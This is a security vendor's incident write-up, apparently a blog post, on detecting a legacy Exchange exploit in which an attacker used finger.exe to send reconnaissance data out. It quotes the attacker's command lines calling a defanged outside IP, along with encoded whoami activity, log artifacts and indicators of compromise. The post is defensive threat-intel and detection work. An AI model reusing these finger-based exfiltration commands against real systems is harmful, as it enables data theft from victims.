ĢTV

This is some text inside of a div block.
Glitch effect

Threat Intel Accelerates Detection & Response

Contributors:
Special thanks to our Contributors:
Glitch effectGlitch effectGlitch effect
Glitch banner

Identifying the Exploit

In November 2023, the ĢTV team identified novel indicators of an attack where the threat actor used [.highlight]finger.exe[.highlight] (top portion illustrated in Figure 1) to exfiltrate reconnaissance information from an endpoint. Due to the novelty of the observed activity, ĢTV analysts conducted a thorough analysis of the available data, documented and shared the findings internally, and then published a blog post to share those findings with the community.

Figure 1: ĢTV Blog

In January 2024, a customer added the ĢTV agent to an endpoint, and as soon as the agent began reporting in, ĢTV SOC analyst Josh Allman noticed a legacy Windows Defender detection, what ĢTV refers to as a “Managed Antivirus” (MAV) alert (illustrated in Figure 2) for a [.highlight]finger.exe[.highlight] command line sending a string of digits to the IP address [.highlight]185.56.83[.]82[.highlight], the same IP address associated with the November activity. The SOC identified the similarities in the indicators of attack, and shared the MAV alert with the threat intel team.

Figure 2: MAV Alert via ĢTV Portal

At this point, the ĢTV agent had only been on the endpoint for a matter of minutes, and the MAV alert preceded the agent installation by almost two weeks. At the point the threat intel team accessed the endpoint information page in the ĢTV portal, the agent had only been installed on the endpoint for 27 minutes.

Digging a bit deeper into data retrieved from the endpoint, ĢTV threat intel analysts located the Windows Defender detection events within a timeline created from Windows Event Log data. These detection events identified a total of four command lines, three of which were base64-encoded PowerShell commands, the fourth was not encoded, and Windows Defender was successful in remediating all four commands.

The first detected command, when decoded, was:

[.highlight]finger user@185.56.83[.]82[.highlight]

This was followed by an encoded PowerShell command that was a further-obfuscated PowerShell command, and then an encoded [.highlight]whoami[.highlight] command, which is illustrated in Figure 3.

Figure 3: Decoding PowerShell via CyberChef

The final command was not encoded PowerShell:

[.highlight]C:\Windows\System32\cmd.exe /c finger 42341@185.56.83[.]82[.highlight]

The time between Windows Defender identifying ([.highlight]Windows Defender/1116[.highlight] event record) and taking action on ([.highlight]Windows Defender/1117[.highlight] event record) was 17 seconds, more than enough time for the command to complete successfully. There was similar timing between the other commands detected by Windows Defender, and without access to the threat actor’s system, ĢTV analysts proceeded with analysis and response assuming that they’d completed successfully.

The three base64-encoded PowerShell commands identified by Windows Defender also corresponded with event records from the [.highlight]C:\Windows\System32\winevt\Logs\MSExchange Management.evtx[.highlight] Event Log file, with source “[.highlight]MSExchange CmdletLogs[.highlight]“, and event ID [.highlight]6[.highlight]. These event records contain, among other strings, XML-formatted data that includes the string [.highlight]ProcessStartInfo Arguments[.highlight] , followed by the encoded PowerShell.

Digging deeper, ĢTV analysts located relevant data associated with the [.highlight]185.56.83[.]82[.highlight] IP address in the [.highlight]C:\inetpub\Logs\LogFiles\W3SCV1\u_ex240112.log[.highlight] file; specifically, POST requests with status code of 200, to the [.highlight]/owa/mastermailbox@outlook.com/powershell[.highlight] page (User-Agent: [.highlight]Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36[.highlight]) corresponded to the Windows Event Log records from both Windows Defender and MSExchange, occurring at the same time, creating an artifact constellation, and augmenting the timeline to validate findings. An excerpt of the web server log entry is illustrated in Figure 4.

Figure 4: Web Server Log Entry Excerpt

Viewed together, this artifact constellation corresponds to the shared by Palo Alto Network’s Unit42 in December 2022. In their article, Unit42 attributed the discovery of the threat actor’s exploit code to ĢTV’ very own .

The total time between the identified commands was under a minute, as illustrated in both the Windows Event Log data, and the web server logs. As there was no follow-on activity identified, it would appear that the commands detected were associated with a scan. ĢTV analysts verified that the customer’s version of MSExchange had last been updated in September 2021, and following the confirmation of these findings, the customer was notified of the immediate need to update their MSExchange installation.

Conclusion

This incident illustrates how the previous identification and sharing of indicators of compromise led to swift identification and response to a legacy exploit that existed on an endpoint prior to the ĢTV agent being installed. This demonstrates how ĢTV doesn’t wait to protect the 99%, and will use whatever information is available to clearly and accurately identify an incident, and provide remediation steps.

Indicators of Compromise

[.highlight]185.56.83[.]82[.highlight] - Source IP address for POST requests to the web server, as well as destination IP address for [.highlight]finger.exe[.highlight] commands.

MSExchange CmdletLogs/6 event records in the [.highlight]C:\Windows\System32\winevt\Logs\MSExchange Management.evtx[.highlight] Event Log file that contain the strings “[.highlight]System.Diagnostics[.highlight]”, "[.highlight]w3wp#MSExchangePowerShellAppPool[.highlight]", and “[.highlight]ProcessStartInfo Arguments[.highlight]”, followed by the base64-encoded PowerShell commands.

Web server logs (from the C:\inetpub\Logs\LogFiles\W3SCV1 folder, in this instance) containing POST requests to [.highlight]/owa/mastermailbox@outlook.com/powershell[.highlight], the [.highlight]185.56.83[.]82[.highlight] IP address (source of request), and the User-Agent string [.highlight]Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36[.highlight].

MITRE ATT&CK Mapping

Initial Access - T1190 - Exploit Public-Facing Application

Execution - T1059.001 (PowerShell), T1059.003 (Windows Command Shell)

Persistence - T1078 (Valid Accounts; per , the threat actor had to first authenticate to the server prior to exploitation)

Share

Sign Up for Blog Updates

Subscribe today and you’ll be the first to know when new content hits the blog.

By submitting this form, you accept our Privacy Policy
Oops! Something went wrong while submitting the form.
ĢTV at work
Threat Analysis
Threat Analysis
Cybersecurity Education
Cybersecurity Education